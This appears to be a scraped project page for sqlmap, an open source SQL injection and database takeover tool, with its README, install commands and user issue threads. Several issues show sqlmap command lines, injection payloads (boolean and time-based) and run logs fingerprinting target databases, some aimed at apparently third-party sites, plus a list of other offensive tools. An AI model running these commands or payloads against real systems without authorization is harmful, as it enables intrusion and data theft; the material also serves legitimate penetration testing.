Automatic SQL injection and database takeover tool

Overview

sqlmap

Build Status Python 2.6|2.7|3.x License GitHub closed issues Twitter

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

sqlmap is sponsored by SpyderSec.

Screenshots

Screenshot

You can visit the collection of screenshots demonstrating some of the features on the wiki.

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user's manual.

Links

Translations

Comments
  • SQLmap and CVE-2014-1854

    SQLmap and CVE-2014-1854

    Hi,

    Attempting to fully exploit the following vulnerability with sqlmap: http://www.exploit-db.com/exploits/31834/

    You can download the Turnkey Wordpress appliance, then download the vulnerable version of adrotate here:

    http://downloads.wordpress.org/plugin/adrotate.3.9.4.zip

    Simply upload the zip and activate the plugin, you will be vulnerable. I can successfully exploit the SQLi using the PoC and various tinkerings. The fun thing about it is the SQLi result shows up in the Location header (and your HTTP code is 302, instead of 200 when it doesn't work). I have set --code=302 as well as --string='Location:', but I can't get SQLmap to detect it.

    You also must use --tamper=base64encode.

    A problem seems to be there is no body. The result of the first column selected in the payload is put in the Location header.

    opened by brandonprry 38
  • sqlmapapi prot question

    sqlmapapi prot question

    I would like to ask, sqlmapapi if activated will open a port, if I think this port can only visit a ip, sqlmap can be set up?If the port has been scanned, it means that others can access and use.

    enhancement normal miscellaneous 
    opened by M7lrv 28
  • Tor not working

    Tor not working

    can someone tell me, why I gets this error, when I use tor? In normal connecting without tor, all working.

    using python version 2.7
    sqlmap {1.0-dev-nongit-20150919}

    https://gyazo.com/e3ab8127d02ed761fe4723d2b17d43c4

    I use sqlmap.py -u "host" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent

    support 
    opened by Pablossoo 23
  • "sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)"

    Hi Running sqlmap 1.0-dev, Kali linux up to date, tomcat 7, and latest WebGoat v5.4

    I can log into WebGoat via the browser http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100 with the login and password.

    I then tried to execute this:

    sqlmap -u "http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100" --banner --auth-type="Basic" --auth-cred="webgoat:webgoat"

    but it gives me:

    [*] starting at 17:11:09

    [17:11:09] [INFO] testing connection to the target URL [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times

    [*] shutting down at 17:11:09

    I did read the manual page and googled the terms “CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials” read some web sites, but still, I’m stumped. I have read the following links:

    https://github.com/sqlmapproject/sqlmap/issues/542 https://github.com/sqlmapproject/sqlmap/issues/125 http://tech4castblog.wordpress.com/2012/04/20/webgoat-http-authentication-type-and-valid-credentials-401-5/ (so is there a way to specify the port number 8080 to sqlmap? Shouldn’t sqlmap be able to figure out the port number since it’s specified in the URL?…is this the cause of error?)

    http://comments.gmane.org/gmane.comp.security.sqlmap/234

    the above came from the following google terms: “sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)”

    Appreciate some help. Thanks. Gordon

    bug normal request 
    opened by gordonmasec 23
  • [CRITICAL] unable to retrieve the database names

    [CRITICAL] unable to retrieve the database names

    Hello! Why does not searchable database! I have changed in the Tour test comparison page

    C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
    --level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
    osoft SQL Server"
    
    
    
    [09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
    n patch). Potential problems in enumeration phase can be expected
    GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
    ny)? [y/N] N
    sqlmap identified the following injection points with a total of 531 HTTP(s) req
    uests:
    
    ---
    Place: GET
    Parameter: year
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: year=2011 AND 2168=2168
    
    ---
    [09:54:27] [WARNING] changes made by tampering scripts are not included in shown
     payload content(s)
    [09:54:27] [INFO] testing MySQL
    [09:54:27] [WARNING] the back-end DBMS is not MySQL
    [09:54:27] [INFO] testing Oracle
    [09:54:28] [WARNING] the back-end DBMS is not Oracle
    [09:54:28] [INFO] testing PostgreSQL
    [09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
    [09:54:29] [INFO] testing Microsoft SQL Server
    [09:54:29] [INFO] confirming Microsoft SQL Server
    [09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2008
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    [09:54:31] [INFO] fetching database names
    [09:54:31] [INFO] fetching number of databases
    [09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [09:54:31] [INFO] retrieved:
    [09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [09:54:33] [ERROR] unable to retrieve the number of databases
    [09:54:33] [INFO] retrieved:
    [09:54:36] [INFO] falling back to current database
    [09:54:36] [INFO] fetching current database
    [09:54:36] [INFO] retrieved:
    [09:54:40] [CRITICAL] unable to retrieve the database names
    [09:54:40] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 145 times
    
    [*] shutting down at 09:54:40
    
    
    C:\Python27\sqlmap>
    
    invalid support 
    opened by aiongw 23
  • sqlmap missing mandatory options!

    sqlmap missing mandatory options!

    I wanted to start SQLmap on kali linux but i got the following error: sqlmap error: missing a mandatory option (-d, -u, -l , -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or --h for advanced help.

    So i updated Kali Linux, still no fix. Then i downloaded it on windows with Python. still the same error...

    I hope you can help me.

    invalid 
    opened by dispater13 22
  • [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [CRITICAL] unable to execute operating system commands via the back-end DBMS

    Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

    ./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l [00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server' [00:54:07] [INFO] testing connection to the target URL

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: category_id=6 AND 2290=2290

    [00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [*] shutting down at 00:54:08

    support 
    opened by AVR1234 22
  • ridiculous sqlmap issue

    ridiculous sqlmap issue

    The number of times where I've had a straight forward injection and sqlmap has failed to exploit it is unbelievable.

    One example was with a parameter vulnerable to time based sql injection after the order by clause, so the payload would be: vulnerableparameter=2,sleep(2)

    Another payload that works is: vulnerableparameter=2,(select/**/sleep(10)/**/from/**/dual/**/where/**/2/**/=/**/5)

    and then sqlmap should expand on that to get database,tables names etc.. etc. If it tries to end the query, it will break e.g using # or -- or any other comments it will break, so I told sqlmap not to use any and since spaces are not allowed, I also made it use mysql comments.

    I've tried: sqlmap.py -u "http://example.com/?vulnerableparameter=2" -p "vulnerableparameter" --prefix="," --suffix="" --technique=T --dbs --dbms=mysql --level=5 --risk=3 --tamper=space2comment

    and unbelievably, it said it was not injectable, unreal.

    How can sqlmap fail to find such simple injections?

    invalid 
    opened by crossedz 22
  • Asynchronous RESTful API to interact with sqlmap engine

    Asynchronous RESTful API to interact with sqlmap engine

    Design and develop an asynchronous RESTful API to interact with sqlmap engine. This is useful to use/call sqlmap from custom scripts, web interface, third-party tools or similar as opposed to use it from command line or wrap it as in a call similar to os.popen('sqlmap...').

    This API will replace the XML-RPC service (#287).

    enhancement normal miscellaneous 
    opened by bdamele 22
  • Skip sqlmap waf testing

    Skip sqlmap waf testing

    When I try to start testing with sqlmap, sqlmap will send queries like these :

    1'tFmggO<'">AeQpzc

    1"(,..,'(,,

    And my target will response with error 500 and sqlmap will show me connection dropped

    I tested my target manualy and it is okey

    So how should I skip those two queries? Or in which files I can comment this lines?

    Regards

    opened by johnyjin 20
  • can't injection eg. id[*]=0

    can't injection eg. id[*]=0

    id[*]=0 I want to inject inside like this: id[' aNd select * from user#]=1 or this: id[' aNd select * from user#]=

    but.. sqlmap payload: id[' aNd select * from user# 從我的 MI6,使用 FastHub 發送。

    從我的 MI6,使用 FastHub 發送。

    support 
    opened by 687766616e 20
Releases(1.7)
Simples brute forcer de diretorios para web pentest.

🦑 dirbruter Simples brute forcer de diretorios para web pentest. ❕ Atenção Não ataque sites privados. Isto é illegal. 🖥️ Pré-requisitos Ultima versã

Dio brando 6 Jan 22, 2022
GitLab CI security tools runner

Common Security Pipeline Описание проекта: Данный проект является вариантом реализации DevSecOps практик, на базе: GitLab DefectDojo OpenSouce tools g

Сити-Мобил 14 Dec 23, 2022
This tool was created in order to automate some basic OSINT tasks for penetration testing assingments.

This tool was created in order to automate some basic OSINT tasks for penetration testing assingments. The main feature that I haven't seen much anywhere is the downloadd google dork function where t

Tobias 5 May 31, 2022
TLaunch: Launch Programs on Multiple Hosts

TLaunch: Launch Programs on Multiple Hosts Introduction Deepmind launchpad is a library that helps writing distributed program in a simple way. But cu

Tsinghua AI Research Team for Reinforcement Learning 11 Nov 11, 2022
IDA Python Script for anti ollvm

IDA Python Script for anti ollvm

Shocker 62 Dec 23, 2022
Proof of concept to check if hosts are vulnerable to CVE-2021-41773

CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV

Jordan Jay 43 Nov 09, 2022
Update of uncaptcha2 from 2019

YouTube Video Proof of Concept I created a new YouTube Video with technical Explanation for breaking Google's Audio reCAPTCHAs: Click on the image bel

Nikolai Tschacher 153 Dec 20, 2022
Nmap scanner with python

Nmap_scanner Usage: sudo python3 nmap_ping.py -i Network List.txt -o Output Folder Location Program can Run Ping Scan Run Port Scan Run Nmap Vuln

Arshaad Mohiadeen 3 Apr 13, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

MalwareTech 91 Dec 29, 2022
A python script to bypass 403-forbidden.

4nought3 A python script to bypass 403-forbidden. It covers methods like Host-Header Injections, Changing HTTP Requests Methods and URL-Injections. Us

11 Aug 27, 2022
Simulating Log4j Remote Code Execution (RCE) vulnerability in a flask web server using python's logging library with custom formatter that simulates lookup substitution by executing remote exploit code.

py4jshell Simulating Log4j Remote Code Execution (RCE) CVE-2021-44228 vulnerability in a flask web server using python's logging library with custom f

Narasimha Prasanna HN 86 Aug 21, 2022
A security system to warn you when people enter your room 🎥

Get Out My Room v0.1 I hate people coming in my room when i'm not there. Get Out My Room is a simple security system that sends notifications with vid

ScriptLine 1 Jan 11, 2022
A Python Scanner for log4j

log4j-Scanner scanner for log4j cat web-urls.txt | python3 log4j.py ID.burpcollaborator.net web-urls.txt http://127.0.0.1:8080 https://www.google.c

Ihebski 5 Jun 26, 2022
A Python tool to automate some dorking stuff to find information disclosures.

WebDork v1.0.3 A open-source tool to find publicly available sensitive information about Companies/Organisations! WebDork A Python tool to automate so

Rahul rc 123 Jan 08, 2023
BETA: Layla - recon tool for bug bounty

WELCOME TO LAYLA Layla is a python script that automatically performs recon on a

Matheus Faria 68 Jan 04, 2023
Exploit grafana Pre-Auth LFI

Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3

2 Jul 25, 2022
KeyLogger

By-Emirhan KeyLogger Hangi Sistemlerde Çalışır? | On Which Systems Does It Work? KALİ LİNUX UBUNTU PARDUS MİNT TERMUX ARCH YÜKLEME & ÇALIŞTIRMA KOMUTL

2 Feb 24, 2022
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)

python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)

1frame 266 Jan 02, 2023
This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

Николай Борщёв 2 Oct 05, 2022